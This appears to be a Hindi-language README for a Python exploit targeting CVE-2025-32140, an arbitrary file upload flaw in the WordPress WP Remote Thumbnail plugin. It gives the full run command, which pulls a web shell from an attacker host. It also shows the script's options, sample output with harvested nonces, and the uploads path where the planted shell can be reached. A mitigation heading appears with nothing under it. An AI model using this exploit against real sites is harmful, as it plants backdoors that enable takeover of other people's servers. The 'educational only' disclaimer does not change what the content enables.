
वर्डप्रेस WP Remote Thumbnail Plugin <= 1.3.2 मनमानी फ़ाइल अपलोड के लिए संवेदनशील है।
CVE-2025-32140 वर्डप्रेस के लिए WP रिमोट थंबनेल प्लगइन में एक गंभीर कमजोरी है। यह प्रमाणित हमलावरों (योगदानकर्ता या उच्च अनुमतियों वाले) को अस्वच्छ URLs स्वीकार करने वाली एक दोषपूर्ण सुविधा का दुरुपयोग करके मनमानी फ़ाइलें, जैसे वेब शेल, अपलोड करने में सक्षम बनाता है।
प्लगइन प्रदान किए गए remote_thumb URL से प्राप्त फ़ाइल प्रकार या सामग्री को मान्य करने में विफल रहता है। यह हमलावरों को दुर्भावनापूर्ण PHP फ़ाइलों (जैसे, बैकडोर) को /wp-content/uploads निर्देशिका में सहेजने की अनुमति देता है।
edit_post क्षमता वाला प्रमाणित उपयोगकर्ता)यह Python स्क्रिप्ट CVE-2025-32140 के शोषण को स्वचालित करती है, निम्नलिखित चरणों का प्रदर्शन करती है:
remote_thumb पैरामीटर के माध्यम से एक दुर्भावनापूर्ण अनुरोध तैयार करता है और भेजता है।python CVE-2025-32140.py -u http://target.com/wordpress -un admin -p admin -uid 1 -pid 631 --shell http://attacker.com/shell.php
usage: CVE-2025-32140.py [-h] --url URL --username USERNAME --password PASSWORD --user_ID USER_ID --post_ID POST_ID --shell SHELL
Exploit For CVE-2025-32140 # By: Nxploited | Khaled Alenazi
options:
-h, --help show this help message and exit
--url, -u URL Target WordPress site URL (e.g., http://192.168.100.74:888/wordpress)
--username, -un USERNAME
Username
--password, -p PASSWORD
Password
--user_ID, -uid USER_ID
User ID (usually 1 for admin)
--post_ID, -pid POST_ID
Target post ID
--shell SHELL URL of the shell to be uploaded (e.g., http://attacker.com/shell.php)
[+] Logged in successfully.
[+] Cookies set successfully.
[DEBUG] Extracted _wpnonce: b4ef78e77d
[DEBUG] Extracted meta-box-order-nonce: 0c192fe62e
[DEBUG] Extracted closedpostboxesnonce: 52be514040
[DEBUG] Extracted samplepermalinknonce: 7b213c6597
[DEBUG] Extracted wprthumb_nonce: 45803ee312
[DEBUG] Extracted X-WP-Nonce: None
[+] Exploit POST sent successfully. Check your uploads directory.
By: Nxploited ( Khaled Alenazi ) | https://github.com/Nxploited
एक बार शोषण होने के बाद, अपलोड किया गया वेब शेल संभवतः यहाँ संग्रहीत होगा:
http://target.com/wordpress/wp-content/uploads/YYYY/MM/shell.php
YYYY/MM को अपलोड के वर्तमान वर्ष और महीने से बदलें।
इस कमजोरी से उत्पन्न जोखिम को कम करने के लिए:
यह स्क्रिप्ट केवल शैक्षिक उद्देश्यों के लिए प्रदान की गई है।
लेखक इस एक्सप्लॉइट के कारण होने वाले किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।
द्वारा: Nxploited ( Khaled Alenazi ) 🌟
| विकल्प | उपनाम | विवरण |
|---|
--url | -u | लक्ष्य वर्डप्रेस साइट URL (जैसे, http://target.com/wordpress) |
--username | -un | पोस्ट संपादन विशेषाधिकारों वाला वर्डप्रेस उपयोगकर्ता नाम |
--password | -p | निर्दिष्ट उपयोगकर्ता नाम का पासवर्ड |
--user_ID | -uid | वर्डप्रेस उपयोगकर्ता आईडी (आमतौर पर एडमिन के लिए 1) |
--post_ID | -pid | संपादित की जाने वाली पोस्ट की आईडी (एक ड्राफ्ट हो सकता है) |
--shell | हमलावर के सर्वर पर होस्ट किए गए PHP वेब शेल का सीधा URL |